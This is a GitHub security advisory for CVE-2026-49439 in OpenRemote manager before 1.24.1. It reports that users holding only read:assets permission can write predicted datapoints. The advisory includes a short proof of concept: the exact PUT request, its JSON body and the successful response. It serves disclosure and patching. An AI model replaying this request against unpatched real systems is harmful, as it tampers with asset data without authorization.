Skip to content

OpenRemote read-only asset users can write predicted datapoints

Moderate severity GitHub Reviewed Published Jun 3, 2026 in openremote/openremote

Package

maven io.openremote:openremote-manager (Maven)

Affected versions

< 1.24.1

Patched versions

1.24.1

Description

Summary

The predicted datapoint write endpoint allows users with only read:assets privileges to write predicted datapoints.

The endpoint:

PUT /api/{realm}/asset/predicted/{assetId}/{attributeName}

accepts write requests from users lacking write:assets.

The implementation appears to check READ_ASSETS while performing a write operation through:

assetPredictedDatapointService.updateValues(...)

PoC

A user was created with only:

read:assets

and without write:assets.

The following request succeeded:

PUT /api/master/asset/predicted/4Fr8Pcp7iDjrEmoSUFolvT/temperature

Request body:

[{"x":1779199999001,"y":1337}]

Response:

HTTP/2 204

Database verification confirmed the datapoint was written successfully:

entity_id: 4Fr8Pcp7iDjrEmoSUFolvT
attribute_name: temperature
value: 1337

Impact

Users with read-only asset permissions can modify predicted datapoints for assets.

References

@ebariaux ebariaux published to openremote/openremote Jun 3, 2026
Published to the GitHub Advisory Database Jul 6, 2026
Reviewed Jul 6, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

EPSS score

Weaknesses

Missing Authorization

The product does not perform an authorization check when an actor attempts to access a resource or perform an action. Learn more on MITRE.

CVE ID

CVE-2026-49439

GHSA ID

GHSA-xj53-j257-hxvg

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.